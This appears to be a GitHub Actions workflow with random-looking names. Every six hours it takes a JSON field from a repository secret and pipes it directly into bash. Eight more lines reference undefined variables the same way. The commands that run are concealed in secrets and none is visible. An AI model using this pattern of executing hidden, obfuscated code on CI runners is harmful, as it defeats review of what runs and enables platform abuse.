name: xianghuaguo3451
on:
  workflow_dispatch:
  schedule:
    - cron: '30 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xianghuaguo3451
        env:
          jrlge833: ${{ secrets.jrlge833 }}
        run: |
          echo $jrlge833 | jq -r .gubrb37 | /bin/bash
          echo $l88333 | jq -r .m1755 | /bin/bash
          echo $tqvp072 | jq -r .s78 | /bin/bash
          echo $wyll5597 | jq -r .amkfg12878 | /bin/bash
          echo $cfyz93 | jq -r .ic66 | /bin/bash
          echo $aorz3895 | jq -r .ap701 | /bin/bash
          echo $vvlj04710 | jq -r .ulzk55701 | /bin/bash
          echo $kwu29346 | jq -r .bzldk8704 | /bin/bash
          echo $q63291 | jq -r .r035 | /bin/bash

